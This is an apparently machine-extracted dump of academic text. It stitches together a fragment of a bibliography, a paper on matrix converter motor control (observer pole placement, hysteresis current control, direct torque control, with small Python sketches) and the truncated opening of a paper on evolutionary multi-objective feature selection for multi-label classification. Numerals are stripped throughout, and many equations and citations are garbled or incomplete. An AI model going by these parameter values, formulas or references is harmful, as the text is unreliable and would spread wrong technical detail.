. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /rstb. . http://dx.doi.org/ . /d http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /peerj-cs. williams p, byvaltsev a, cederberg b, berezin m, Ødegaard f, rasmussen c, richardson l, huang j, sheffield c, williams s. . genes suggest ancestral colour polymorphisms are shared across morphologically cryptic species in arctic bumblebees. plos one ( ):e doi . /journal.pone. . wright s. . the genetical structure of populations. annals of eugenics ( ): – . yao p-c, gao h-y, wei y-n, zhang j-h, chen x-y, li h-q. . evaluating sampling strategy for dna barcoding study of coastal and inland halo-tolerant poaceae and chenopodiaceae: a case study for increased sample size. plos one ( ):e doi . /journal.pone. . young r, abott c, therriault t, adamowicz s. . barcode-based species delimitation in the marine realm: a test using hexanauplia (multicrustacea: thecostraca and copepoda). genome ( ): – doi . /gen- - . zhang a-b, he l-j, crozier rh, muster c, zhu c-d. . estimating sample sizes for dna barcoding. molecular phylogenetics and evolution ( ): – doi . /j.ympev. . . . zhang j, kapli p, pavlidis p, stamatakis p. . a general species delimitation method with applications to phylogenetic placements. bioinformatics ( ): – doi . /bioinformatics/btt . phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /gen- - http://dx.doi.org/ . 
international journal of advanced network, monitoring and controls
research on control strategy of matrix converter motor system
xu shuping, chang yichen, su xiaohui, guo yu. school of computer science and engineering, xi'an technological university, xi'an, china.
abstract: in order to remove the obstacles to the industrial application of the matrix converter (mc), the matrix converter motor system (mcms) is proposed. the control strategies of the mcms are studied by combining the control of the mc with the control of the motor. the effects of the voltage vector amplitude and of direct torque control are analyzed. the simulation results show that the disadvantages of the usual methods can be overcome by the new method, which obtains higher accuracy and robustness; the dynamic and static performance of direct torque control based on it is better than that of conventional direct torque control. an improved control strategy is proposed.
keywords: matrix converter; vvvf control; vector control; direct torque control
i. introduction
the output frequency of a matrix converter is independent of the input frequency; it has no dc link, small size and compact structure, good input/output current quality, an adjustable input power factor, and allows bidirectional energy flow. it therefore meets the ideal requirements of an electric drive and is expected to become a mainstream technology for future electric transmission [ - ]. the biggest obstacle hindering the matrix converter from entering industrial application is its low voltage transfer ratio: with linear modulation, the maximum voltage transfer ratio of a matrix converter is 0.866 [ - ]. scholars have therefore proposed various solutions. the matrix converter motor system is a combination of the matrix converter and the motor, so its control strategy is also a combination of matrix converter control and motor control methods. this paper proposes the concept of the matrix converter motor system to address the problems of bringing the matrix converter into industrial applications, and studies the control strategy of the matrix converter motor system by combining matrix converter control methods with motor speed-control methods.
ii. matrix converter motor system
the matrix converter motor system is composed of a matrix converter, a matrix converter motor, an input filter, a clamp circuit and other components, as shown in the figure below. the rated magnetic flux of the matrix converter motor is designed on the basis of the maximum voltage transfer ratio of 0.866 of the matrix converter, so as to meet the voltage-transfer-ratio requirement while taking integration with the matrix converter into account. in order to filter the high-order harmonics in the input current caused by the switching frequency, the matrix converter motor system needs an input filter.
viewed from the supply side, the matrix converter behaves as a current source, so a second-order lc filter circuit is adopted. the design criteria of the lc input filter are as follows: the cutoff frequency of the input filter should be lower than the switching frequency; the power-factor angle offset caused by the filter should be minimal at the minimum output power; for a given voltage and current rating, the size or weight of the input filter should be minimized by selecting capacitors with different power densities; and, at rated current, the voltage drop across the filter inductor should be minimal, to reduce its adverse effect on the voltage transfer ratio.
figure: the topology of the matrix converter motor system (mains, input filter, matrix converter, clamp circuit, induction motor).
iii. matrix converter control strategies and motor control strategies
a three-phase/three-phase matrix converter consists of nine bidirectional switches. two basic principles constrain matrix converter control: two input phases must never be connected to the same output phase at the same time, to prevent a short circuit; and every output phase must always be connected to an input phase, to prevent an open circuit of the inductive load. under these constraints, the matrix converter has 27 permissible switch states in total. matrix converter control strategies include the switching function method, the dual-voltage vector method, the space vector modulation method and the hysteresis current tracking method. the switching function method calculates the duty cycles of the switches from the relationship between the actual inverter inputs and the required outputs[ ]. the dual-voltage synthesis method uses, in each switching cycle, linear combinations of two input line voltages to synthesize the output line voltages two phases at a time[ ]. the space vector modulation method is based on the virtual dc-link idea: the matrix converter is treated as an equivalent dual-pwm converter with the dc link removed, space vector modulation is applied to both the equivalent rectifier and inverter stages of this ac-dc-ac structure, and the result is mapped back to the matrix converter[ ]. the hysteresis current tracking method applies hysteresis tracking to the output current so that it follows the reference current[ ].
motor control strategies include vvvf control, vector control and direct torque control. through a speed regulator, vvvf control closes the speed loop; vector control achieves a double closed loop of rotational speed and the torque component of the stator current, with the speed loop as the outer loop and the torque-current loop as the inner loop; direct torque control achieves a double closed loop of speed and torque, with the speed loop as the outer loop and the torque loop as the inner loop.
iv. mathematical model of pmsm
for the relationship among the flux, voltage and current vectors in the permanent magnet synchronous motor, the d, q coordinate system is fixed to the rotor and the x, y coordinate system rotates with the stator. the stator flux $\psi_s = [\psi_d, \psi_q]^T$ is taken as the state vector, the stator current $i_s = [i_d, i_q]^T$ as the output vector, and $u = [u_d, u_q, \psi_f]^T$ as the input vector.
so the motor model can be rewritten in matrix form as

$\frac{d}{dt}\begin{bmatrix}\psi_d\\ \psi_q\end{bmatrix} = \begin{bmatrix}-R_s/L_d & \omega_e\\ -\omega_e & -R_s/L_q\end{bmatrix}\begin{bmatrix}\psi_d\\ \psi_q\end{bmatrix} + \begin{bmatrix}1 & 0 & R_s/L_d\\ 0 & 1 & 0\end{bmatrix}\begin{bmatrix}u_d\\ u_q\\ \psi_f\end{bmatrix}$

$\begin{bmatrix}i_d\\ i_q\end{bmatrix} = \begin{bmatrix}1/L_d & 0\\ 0 & 1/L_q\end{bmatrix}\begin{bmatrix}\psi_d\\ \psi_q\end{bmatrix} + \begin{bmatrix}0 & 0 & -1/L_d\\ 0 & 0 & 0\end{bmatrix}\begin{bmatrix}u_d\\ u_q\\ \psi_f\end{bmatrix}$

where $\psi_d, \psi_q$ are the d- and q-axis flux linkages and $u_d, u_q$ are the axis voltages.
v. the stator flux based full-dimensional state observer
a. structure of the stator flux full-dimensional state observer
in practice, not all state variables can be measured directly, so the state can be reconstructed from measurable variables by constructing an artificial system identical to the original one. since this system is constructed artificially, all of its state variables can be measured. the constructed system is
$\dot{\hat{\psi}}_s = A\hat{\psi}_s + Bu_s, \qquad \hat{i}_s = C\hat{\psi}_s + Du_s$
where $\hat{\psi}_s$ is the estimate of the state vector $\psi_s$ that the observer has to track, and
$A = \begin{bmatrix}-R_s/L_d & \omega_e\\ -\omega_e & -R_s/L_q\end{bmatrix}, \quad B = \begin{bmatrix}1 & 0 & R_s/L_d\\ 0 & 1 & 0\end{bmatrix}, \quad C = \begin{bmatrix}1/L_d & 0\\ 0 & 1/L_q\end{bmatrix}, \quad D = \begin{bmatrix}0 & 0 & -1/L_d\\ 0 & 0 & 0\end{bmatrix}$
with $\psi_s = [\psi_d, \psi_q]^T$, $u_s = [u_d, u_q, \psi_f]^T$ and $i_s = [i_d, i_q]^T$. the estimation error $\tilde{\psi}_s = \psi_s - \hat{\psi}_s$ then satisfies $\dot{\tilde{\psi}}_s = A\tilde{\psi}_s$, whose solution is $\tilde{\psi}_s(t) = e^{At}\,\tilde{\psi}_s(0)$. it follows that if $\hat{\psi}_s(0) = \psi_s(0)$ then $\hat{\psi}_s \equiv \psi_s$. in general, however, it is impossible to guarantee identical initial conditions at all times. therefore, to eliminate the state error, error feedback $G(i_s - \hat{i}_s)$ is introduced, following the basic principles of control theory. introducing the feedback term has two advantages: first, when the initial states $\psi_s(0)$ and $\hat{\psi}_s(0)$ differ, it keeps the deviation from growing or oscillating as time increases; second, it overcomes the shortcoming of the open-loop observer, which cannot be adjusted when the matrix a changes and whose deviation between $\psi_s$ and $\hat{\psi}_s$ then becomes worse. the state estimation error of the observer is
$\tilde{\psi}_s(t) = e^{(A-GC)t}\,[\psi_s(0) - \hat{\psi}_s(0)]$
clearly, as long as the eigenvalues of the matrix $(A-GC)$ of the chosen observer all have negative real parts, the state estimate $\hat{\psi}_s$ converges to the real value $\psi_s$.
b. pole placement
the poles of the observer are the eigenvalues of $(A-GC)$, which are decisive for the observer performance. the observer poles are usually placed so that the observer responds faster than the system model, which makes the observation error converge quickly. to obtain the eigenvalues of $(A-GC)$, this paper uses the induction-motor pole-configuration method from the literature, in which the observer poles are placed in direct proportion to the poles of the motor model. the poles of the motor are the eigenvalues of $(sI-A)$, i.e., the roots of
$\left(s + \frac{R_s}{L_d}\right)\left(s + \frac{R_s}{L_q}\right) + \omega_e^2 = 0$
which gives the two poles
$s_{1,2} = -\frac{1}{2}\left(\frac{R_s}{L_d} + \frac{R_s}{L_q}\right) \pm \sqrt{\frac{1}{4}\left(\frac{R_s}{L_d} - \frac{R_s}{L_q}\right)^2 - \omega_e^2}$
(the square root becomes $\pm j\sqrt{\omega_e^2 - \tfrac{1}{4}(R_s/L_d - R_s/L_q)^2}$ when the poles are complex). the observer poles are set to k times the motor poles, $s_o = k\,s$; a fixed value of k is used in this article.
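as an illustration of this pole-placement design, the following python sketch builds the flux-model matrices, scales the motor poles by k, and computes the observer gain with a standard pole-placement routine. it is only a sketch: the numerical values are placeholders and are not the parameters of the motor used in this paper.

```python
import numpy as np
from scipy.signal import place_poles

# illustrative parameters (placeholders, not the article's values)
Rs, Ld, Lq = 1.0, 8.5e-3, 8.5e-3   # stator resistance [ohm], d/q inductances [H]
we = 2 * np.pi * 50                # electrical angular speed [rad/s]
k = 2.0                            # observer poles = k * motor poles

# flux-state model: d(psi)/dt = A psi + B u,  i = C psi + D u
A = np.array([[-Rs / Ld,  we],
              [-we,      -Rs / Lq]])
C = np.array([[1 / Ld, 0.0],
              [0.0,    1 / Lq]])

motor_poles = np.linalg.eigvals(A)     # poles of the motor model
observer_poles = k * motor_poles       # proportional pole placement

# observer gain G from the dual problem: placing the poles of (A - G C)
# is done by placing the poles of (A' - C' G'), i.e. G = place(A', C', p)'
G = place_poles(A.T, C.T, observer_poles).gain_matrix.T
print("motor poles:", motor_poles)
print("observer gain G:\n", G)
```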
using the scientific-computing capabilities of matlab and the control system toolbox, the observer gain matrix g can be obtained from the robust pole-assignment algorithm as g = place(a′, c′, p)′, where p is the vector of desired observer poles.
vi. control strategy of matrix converter motor system
the control strategy of the matrix converter motor system is essentially a combination of matrix converter control and motor control.
a. matrix converter space vector modulation and motor vvvf control
current studies generally combine matrix converter space vector modulation with motor vvvf control: vvvf control provides the amplitude and frequency of the reference output voltage, while space vector modulation of the matrix converter performs input power-factor correction and generates the output voltage. this only closes the speed loop, so it cannot meet the speed requirements of a high-performance motor system. because the duty-cycle calculation in space vector modulation is based entirely on the ideal input and the desired output, it is unrelated to the actual input and output and does not suppress harmonics; to improve robustness to the input, the voltage space vector can be introduced as negative feedback to close the loop[ ].
b. hysteresis current comparison method
the hysteresis current comparison method can be combined with vector control: vector control of the motor yields the three-phase stator reference currents, and the matrix converter is then controlled by hysteresis current comparison. the realization can be divided into a direct and an indirect method, depending on whether the virtual dc-link idea is adopted. the direct method works as follows: when the hysteresis current comparator requires a phase current to increase, that output phase is connected to the input phase with the maximum voltage; when the comparator requires a phase current to decrease, the output phase is connected to the input phase with the minimum voltage[ ]. the indirect method treats the matrix converter as an equivalent ac-dc-ac structure with the dc link removed, in which the hysteresis current comparison method controls the inverter stage and the output voltage of the rectifier stage, u_pn, serves as the dc bus voltage of the inverter stage. the dc bus voltage of the equivalent ac-dc-ac structure is built from the three-phase input line voltages and fluctuates between zero and the maximum input line voltage. therefore, high, middle and low ranges of the equivalent dc bus voltage are available: the high range is [ . u_max, u_max], the middle range [ . u_max, . u_max], and the low range [0, . u_max], where u_max is the maximum input line voltage. it can be seen that the direct method is essentially the indirect method with the high dc bus voltage selected. the hysteresis current comparison method presumes that the dc bus voltage is greater than the motor stator emf. when the equivalent dc bus voltage of the matrix converter is small, the dc bus voltage may fall below the stator emf; in that case the hysteresis current comparison has the opposite effect on the current to what is expected and the error is aggravated, which increases the current and torque ripple and reduces system performance. therefore, the high dc bus voltage is generally chosen.
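to make the direct method concrete, the sketch below chooses, at one sampling instant, the input phase to connect to each output phase from the sign requested by the hysteresis comparator. it is an illustrative fragment with hypothetical variable names, not part of the simulated system described next.

```python
import numpy as np

def hysteresis_direct_switching(i_ref, i_out, v_in, band):
    """direct method: pick the input phase each output phase connects to.

    i_ref, i_out : reference and measured output phase currents, shape (3,)
    v_in         : instantaneous input phase voltages, shape (3,)
    band         : hysteresis band width
    returns      : index of the chosen input phase per output phase,
                   or -1 when the error is inside the band (keep previous state).
    """
    hi, lo = int(np.argmax(v_in)), int(np.argmin(v_in))
    choice = np.full(3, -1, dtype=int)
    err = i_ref - i_out
    choice[err > +band / 2] = hi   # comparator asks to increase -> max input phase
    choice[err < -band / 2] = lo   # comparator asks to decrease -> min input phase
    return choice

# example for one sampling instant
print(hysteresis_direct_switching(
    i_ref=np.array([5.0, -2.0, -3.0]),
    i_out=np.array([4.0, -1.0, -3.1]),
    v_in=np.array([310.0, -120.0, -190.0]),
    band=0.5))
```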
the vector control of the matrix converter motor system with the hysteresis current comparison method was simulated in matlab/simulink, using the high dc bus voltage and a three-phase, four-pole squirrel-cage induction motor (rs = . Ω, rr = . Ω, ls = lr = mh, lm = . mh) with a current hysteresis width of a. the torque is initialized at n·m and stepped to n·m at . s; the speed reference is set to rad/s, and the speed controller is a pid controller. the simulation waveforms of vector control of the matrix converter motor system are shown in the following figures.
figure: the speed and torque of the motor. figure: the stator current of phase a.
the control of the rectifier stage only provides the dc bus voltage to the inverter; input power-factor correction at the rectifier stage can in fact be achieved by space vector modulation, but a problem arises: when the rectifier stage outputs the middle or zero voltage, the hysteresis current comparison method in the inverter stage fails and the vector control is affected. the waveforms of the rectifier stage simulated with space vector modulation are shown in the following figures. space vector modulation can also be combined with vector control: the stator reference current obtained from vector control is converted into a stator reference voltage, and with space vector modulation the rectifier stage provides input power-factor correction while the inverter stage generates the required reference voltage[ ].
c. direct torque control
the combination of direct torque control and matrix converter control can be interpreted through the matrix converter output voltage space vectors.
figure: the speed and torque of the motor. figure: the stator current of phase a.
a three-phase/three-phase matrix converter has 27 switch states in total, each corresponding to an output voltage vector. they can be divided into three categories: ① zero voltage vectors; ② voltage vectors with varying amplitude and constant phase angle; ③ voltage vectors with fixed amplitude and varying phase angle. direct torque control performs qualitative control of the torque and the stator flux amplitude using hysteresis comparators. the phase angle of a voltage vector determines the direction in which it changes the stator flux and torque, and its amplitude determines the size of the change; fluctuation of the voltage vector amplitude does not affect the feasibility of direct torque control. for the third category of voltage vectors, the system requires real-time information on the voltage vector phase angle to determine how it changes torque and flux. to reduce this burden, matrix converter motor direct torque control systems generally select only the first and second categories. at any instant there are therefore three voltage vectors with the same phase angle but different amplitudes, giving high, medium and low options. the following analyzes the effect of the high, medium and low voltage vectors on system performance. for the same sampling time, the larger the voltage vector magnitude, the larger the torque ripple it causes, while the dynamic performance is proportional to the voltage vector amplitude.
figure: the torque and speed of the motor. figure: the torque error Δte.
the torque ripple of a direct torque control system can be divided into two categories: first, for a constant sampling period, the torque ripple caused by discretization, which is proportional to the input line voltage amplitude.
second, the torque ripple caused by failure of direct torque control. direct torque control increases the torque by selecting a forward voltage vector and increasing the angle between the stator flux and the rotor flux, which requires the stator flux to rotate faster than the rotor flux. the rotation speed of the stator flux is determined by the input line voltage, so when the input line voltage is small the system may select a voltage vector intended to increase the torque while the actual torque decreases instead. the size and frequency of this torque ripple are inversely proportional to the input line voltage amplitude. studies show that the high voltage vector does not exhibit this failure of direct torque control, while both the medium and low voltage vectors do; thus, the high voltage vector is generally chosen. direct torque control using the high voltage vector was simulated for the matrix converter motor system, and the results are shown in the following figures. the torque ripple of the direct torque control system can be reduced by selecting between the high and medium voltage vectors: the high input line voltage is selected when the system is in a dynamic state; the medium input line voltage is selected when the system is in steady state; and when direct torque control fails, the high input line voltage is selected, the system state being determined from the size of the torque ripple. the matrix converter motor direct torque control system using this strategy was simulated and the results are shown in the following figures.
figure: the torque and speed of the motor. figure: the torque error Δte.
comparison of the corresponding figures shows that this improved strategy reduces the torque ripple effectively. space vector modulation of the rectifier stage is similar to the indirect method of vector control: the matrix converter is treated as an equivalent ac-dc-ac structure, direct torque control is applied to the inverter stage, and space vector modulation is applied to the rectifier stage.
vii. conclusion
this paper proposed the concept of the matrix converter motor system to address the problems of bringing the matrix converter into industrial applications, studied the control strategy of the matrix converter motor system by combining matrix converter control methods with motor speed-control methods, analyzed the impact of the voltage vector amplitude on the hysteresis current comparator and on direct torque control, and proposed improved control strategies that reduce the torque ripple and take input power-factor control into account.
acknowledgment
the authors wish to thank the cooperators. this research is partially funded by the shaanxi province university student innovation and entrepreneurship fund project (s ) and the engineering laboratory project (gsysj ).
references
[ ] p. w. wheeler, r. jose, c. jon, et al. matrix converters: a technology review [j]. ieee trans. on industrial electronics.
[ ] li yao-hua, et al. an effective way to improve voltage transfer ratio of matrix converter [j]. electric automation.
[ ] guo qian-gang, li yao-hua, meng yan-jing, et al. the theoretical analysis and discussion of matrix converter voltage transfer ratio [j]. electric automation.
[ ] huang ke-yuan, he yi-kang, bian song-jiang. variable speed constant frequency wind power system research of matrix converter ac excitation [j]. csee.
[ ] c. klumpner, p. nielsen, i.
boldea, et al. a new matrix converter motor (mcm) for industry applications [j]. ieee trans. on industrial electronics.
[ ] a. alesina, m. venturini. analysis and design of optimum amplitude nine-switch direct ac-ac converters [j]. ieee trans. on power electronics.
[ ] wang yi, chen xi-you, xu dian-guo. research on two-voltage-synthesis matrix converter loop control [j]. csee.
[ ] l. huber, d. borojevic. space vector modulated three-phase to three-phase matrix converter with input power factor correction [j]. ieee trans. on industry applications.
[ ] zhang zhi-xue, ma hao. the current control strategy of matrix converter [j]. csee.
[ ] wang yi, chen xi-you, xu dian-guo. research on space vector modulated matrix converter closed-loop control [j]. csee.
[ ] ge hong-juan, mu xin-hua, zhang shao, et al. permanent magnet synchronous motor vector control model and simulation based on matrix converter [j]. journal of china university of mining and technology.
[ ] sun kai, huang li-pei, song ta gong-gui. induction motor vector control based on matrix converter [j]. tsinghua university.

an evolutionary decomposition-based multi-objective feature selection for multi-label classification
azam asilian bidgoli, hossein ebrahimpour-komleh and shahryar rahnamayan
department of electrical and computer engineering, university of kashan, kashan, iran; nature inspired computational intelligence (nici) lab, department of electrical, computer, and software engineering, ontario tech university, oshawa, on, canada
abstract
data classification is a fundamental task in data mining. within this field, the classification of multi-labeled data has been seriously considered in recent years. in such problems, each data entity can simultaneously belong to several categories. multi-label classification is important because of many recent real-world applications in which each entity has more than one label. to improve the performance of multi-label classification, feature selection plays an important role. it involves identifying and removing irrelevant and redundant features that unnecessarily increase the dimensions of the search space for the classification problems. however, classification may fail with an extreme decrease in the number of relevant features. thus, minimizing the number of features and maximizing the classification accuracy are two desirable but conflicting objectives in multi-label feature selection. in this article, we introduce a multi-objective optimization algorithm customized for selecting the features of multi-label data. the proposed algorithm is an enhanced variant of a decomposition-based multi-objective optimization approach, in which the multi-label feature selection problem is divided into single-objective subproblems that can be simultaneously solved using an evolutionary algorithm. this approach accelerates the optimization process and finds more diverse feature subsets. the proposed method benefits from a local search operator to find better solutions for each subproblem. we also define a pool of genetic operators to generate new feature subsets based on the old generation. to evaluate the performance of the proposed algorithm, we compare it with two other multi-objective feature selection approaches on eight real-world benchmark datasets that are commonly used for multi-label classification.
the reported results of multi-objective evaluation measures, such as the hypervolume indicator and set coverage, illustrate an improvement in the results obtained by the proposed method. moreover, the proposed method achieved better results in terms of classification accuracy with fewer features compared with state-of-the-art methods.
subjects: artificial intelligence, data mining and machine learning, optimization theory and computation
keywords: feature selection, multi-label classification, multi-objective optimization, decomposition-based algorithm, evolutionary algorithm
introduction
in traditional classification approaches, each sample in a dataset belongs to one class. however, in recent years, to adapt to real-world problems, researchers have studied multi-label learning (zhang & zhou, ). in such problems, each sample in a dataset can simultaneously belong to several classes; therefore, a set of labels is defined for each data entity. because this is supervised learning, the objective of the classification is to create a model from the training data to predict the labels of unseen data. in real-world applications, it is less common for each entity to have exactly one label; for this reason, this is an important direction for research. in multi-label text classification, each text sample can simultaneously belong to different classes (such as "politics" and "sports") (ueda & saito, ). another example is digital image classification: an image sample may contain a mountain, a lake, and a tree; hence, the image is included in each of these classes (boutell et al., ). in the functional classification of genes, every gene is also a member of different functional classes (such as "metabolism" and "protein synthesis") (li, miao & pedrycz, ). the accuracy of a classification task strongly depends on the selected features, which provide the most relevant knowledge about the data to construct a reliable model. feature selection is a data mining preprocessing task that removes irrelevant and redundant features; it reduces computational complexity in the learning process and improves the classifier's performance (zhang, gong & rong, ). in multi-label datasets, each sample is related to more than one label, and the corresponding labels are not necessarily independent of each other; hence, feature selection in such a dataset is more complicated than in single-label classification (zhang et al., ). several researchers have reported that classification performance can be improved using a proper feature selection strategy in multi-label data (madjarov et al., ; lee & kim, ; dembczynski et al., ).
the feature selection methods for both multi-label and single-label datasets can be divided into three categories: wrapper, filter, and embedded methods (pereira et al., ). the wrapper methods select the features based on the resulting classification performance; hence, the learning task is a part of the feature selection process. wrapper methods have been used for multi-label feature selection (dendamrongvit, vateekul & kubat, ; wandekokem, varejão & rauber, ). in filter methods, the best set of features is selected using the statistical characteristics of the data (e.g., the correlation among features and classes); many filter-based feature selection methods have been proposed for multi-label data (spolaôr et al., a, b; reyes, morell & ventura, ; lin et al., ; li, miao & pedrycz, ). the embedded methods select the best subset of features as an integrated part of the learning algorithm. one of the well-known embedded methods is the decision tree algorithm (safavian & landgrebe, ); this classifier constructs a tree-structured model that selects the best feature at each node in terms of a discriminancy criterion. to obtain the best subset out of d features, we would need to evaluate 2^d possible subsets. consequently, selecting the best subset out of all possible subsets is extremely time-consuming, and a brute-force approach is not practical. in fact, feature selection is an np-hard problem (chandrashekar & sahin, ;
zhang et al. ( ) presented a particle swarm optimization (pso)-based multi-objective optimization algorithm and achieved a better accuracy compared with the previous methods. lee, seo & kim ( ) proposed an evolutionary multi-label feature selection that used dependencies between the features and labels to select more relevant features. their method selects features that have a higher level of correlation with the labels and have not been selected using genetic operators during the optimization process. in another study , the most salient features were selected by mapping the features to a multi-dimensional space based on the correlation between features and each label (kashef & nezamabadi-pour, ). however, the authors have only used the pareto-dominance concept inspired by multi-objective optimization. in other words, they do not search the features’ space using a multi-objective optimization algorithm. evolutionary-based multi-objective optimization algorithms can be divided into three categories: dominance-based, decomposition-based, and indicator-based methods (trivedi et al., ). the dominance-based methods attempt to find the solutions that optimize the objective functions by using a concept called dominance, which will be defined in the next section. all the above-mentioned studies on multi-label feature selection belong to this category of multi-objective optimization algorithms. the indicator- based methods evaluate the fitness of each solution by assessing an indicator (such as hypervolume) to improve the convergence and diversity criteria simultaneously. asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ on the contrary, the decomposition-based methods decompose the whole search space into smaller subproblems and solve all of them simultaneously. therefore, the convergence rate of the algorithm is significantly improved, which enhances the diversity of the obtained solutions (zhang & li, ). an advantage of decomposition-based methods is their potential for scalability to multi-objective optimization problems (zhang & li, ). research on feature selection for multi-label data has started recently; therefore, few studies have been conducted in this area, especially for multi-objective problems. the most important aim of this paper is to address this problem for multi-objective optimization. in this article, we propose a decomposition-based method for multi-label feature selection. the objective functions used in this paper include hamming loss and the number of features. the main contributions of the paper can be summarized as follows: ( ) we address the problem of multi-objective feature selection by solving several single- label subproblems, that is, for the first time, decomposition-based evolutionary multi- objective optimization has been used for multi-label classification; ( ) we apply a local search strategy to increase the exploitation power of the proposed method; ( ) we propose a hybrid crossover scheme that switches among crossover operators with a predefined probability. because some of the benchmark datasets have more than , features, we used decomposition-based algorithms, which are beneficial for large-scale problems. to validate the results, we compared the proposed method of multi-label feature selection with state-of-the-art methods. furthermore, to validate the performance of the proposed algorithm, we conducted an extensive set of experiments on real-world multi- label datasets. 
the results show a significant improvement compared with the other methods in terms of multi-objective evaluation measures, such as hypervolume indicator and set-coverage criterion. this article is organized as follows. “background review” describes related work on multi-label classification, multi-objective optimization, and the existing methods for multi- objective multi-label feature selection. the proposed algorithm is explained in “proposed method”. the experiments are presented in “experimental design”. “results and discussion” describes and discusses the results. finally, “concluding remarks” concludes the article. background review in the following subsections, we briefly review related concepts. we start with a brief explanation of multi-label classification to clarify the importance of this research problem. next, we explain multi-objective optimization and the corresponding challenges. finally, we examine existing multi-label feature selection methods that have been proposed for multi-objective optimization algorithms. multi-label classification if a dataset x contains d-dimensional samples and y represents the set of the q possible labels in a multi-label problem, the objective of multi-label classification is to create a model in the form of h : x ! y from m training examples, d = (xi, yi| ≤ i ≤ m). for each multi-label sample (xi, yi), xi includes a d-dimensional feature vector and yi includes asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a set of labels associated with xi. for unseen data xi, the multi-label classifier predicts h(x) as the set of labels. multi-label learning algorithms can be divided into two main categories: problem transformation and algorithm adaptation methods (zhang & zhou, ). in the problem transformation methods, the multi-label classification problem is converted into a single-label problem to classify data using existing single-label classifiers. the basic idea of the algorithm adaptation methods is to adapt single-label classifiers to deal with multi-label data. multi-label k-nearest neighbor (ml-knn) (zhang & zhou, ) is one of the most well-known adaptive methods, and it was used in this study to evaluate feature subsets. in the single-label version of this algorithm, to predict the class label of the sample, the algorithm calculates the distance between the query sample and the other samples in dataset. k neighbors (smallest distances) of the sample should be picked. the algorithm gets the labels of the selected k entries. then it returns the mode of the k labels as the class of query sample. despite its simplicity, this classifier is commonly used on various applications. in its multi-label version ml-knn, as in the single-label version, the sample would be labeled by classes in which the distribution of neighbors is higher. in this direction, decision making is performed for every class as follows: y ¼ fyijpðhjjcjÞ=pð�hjjcjÞ . ; � j � qg ( ) sample x belongs to class j if the posterior probability p(hj|cj) that x belongs to class j, providing that x has exactly cj neighbors with label yj, is bigger than p(∼hj|cj). to obtain the value of posterior probability, bayes’ theorem mentioned in eq. ( ) has been applied. the ratio of two mentioned posterior probabilities determines belonging of the sample to class j. 
according to this equation, the posterior probability is dependent on the values of prior probabilities (p(hj) and p(∼hj)) and likelihood functions (p(cj|hj) and p(cj|∼hj)). pðhjjcjÞ pð�hjjcjÞ ¼ pðhjÞ � pðcjjhjÞ pð�hjÞ � pðcjj�hjÞ ( ) to calculate the p(hj), we obtain the ratio of the samples that have label yj to the total samples. the value of p(cj|hj)) is also calculated using eq. ( ), where kj(r) is the number of samples in the training set that have label yj and have exactly r neighbors with label yj. based on this definition, kj(cj) is the number of samples that belong to class j and have r neighbors in this class. pðcjjhjÞ ¼ kjðcjÞxk r¼ kjðrÞ ð � j � q; � cj � kÞ ( ) because of the simplicity and popularity of ml-knn, we used this classifier to evaluate the quality of selected features in our proposed method. moreover, we use the same classifier to compare several algorithms. multi-objective optimization most real-world optimization problems involve multiple conflicting objectives (konak, coit & smith, ). hence, multi-objective optimization problems have various practical asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ applications. the use of evolutionary algorithms has been motivating for solving such problems. because of the population-based nature of these algorithms, we obtain a set of solutions on every run. in a multi-objective optimization problem, the definition of optimality is not as simple as in single-objective optimization. when the optimal solution of an objective function conflicts with an optimal solution of another objective function, the problem becomes challenging. therefore, to solve such problems, it is necessary to find a trade-off between objective functions. the obtained solutions of multi-objective algorithms are called nondominated solutions or pareto-optimal solutions. theoretically, if a multi-objective optimization problem is a minimization problem, it is formulated as follows (mirjalili et al., ). min fðxÞ ¼ ½f ðxÞ; f ðxÞ; . . . ; fmðxÞ� s:t: li � xi � ui; i ¼ ; ; . . . ; d ( ) subject to the following equality and inequality constraints: giðxÞ � j ¼ ; ; …; j hkðxÞ ¼ k ¼ ; ; …; k ( ) where m is the number of objectives, and d is the number of decision variables (dimension) of solution x, so that xi should be in interval [li,ui] (i.e., box-constraint). finally, fi is the objective function that should be minimized. to compare two candidate solutions in multi-objective problems, we can use the concept of pareto dominance. mathematically, the pareto dominance is defined as follows. if x = (x , x ,…, xd) and �x ¼ ð�x ; �x ; . . . ; �xdÞ are two vectors in the search space, x dominates �xðx � �xÞ if and only if i f ; ; . . . ; mg; fiðxÞ � fið�xÞ^ j f ; ; . . . ; mg : fjðxÞ , fjð�xÞ ( ) this means that solution x dominates solution �x (is better) if and only if the objective values of x are better than or equal to all objective values of �x (is not worse than �x in any of the values of the objective functions) and it has a better value than x in at least one of the objective functions. if the solution x is better than �x in all objectives, we call strong dominance but in the case that they have at least one equal objective, the weak dominance happens. all nondominated solutions construct a pareto front. crowding distance (deb et al., ) is another measure to compute the distribution of candidate solutions in the objective space. 
it is calculated using the sum of distances between each solution and its neighbors. it is computed using eq. ( ). cdi ¼ xm j¼ jfjði þ Þ � fjði � Þj; ( ) where fj(i + ) and fj(i − ) indicate the jth objective value of the previous and next neighbors of solution i. larger distance indicates a non-crowded space. hence, a selection of solutions from this region creates a better distribution. in fact, it represents the distribution of the members surrounding each solution. decomposition-based methods are a category of multi-objective optimization algorithms that decompose the asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ approximation of pf into a number of single-objective optimization subproblems. all subproblems can be solved by using other classical optimization or evolutionary methods simultaneously. a strategy is required to convert a multi-objective optimization problem to single-objective one. during optimization, the trade-off relation between objectives can be applied by considering information mainly from subproblem neighboring. the neighborhood concept is defined by producing a set of weight vectors in objective space. if the subproblems are solved by evolutionary algorithms, neighbors communicate with each other to reproduce the new candidate solutions and update the existing individuals in the population. the steps of a decomposition-based method has been explained in “proposed method” section. tchebycheff method as stated before, multi-objective optimization problems can be solved by different methods. traditional multi-objective optimization methods seek a way to convert the multi-objective problem 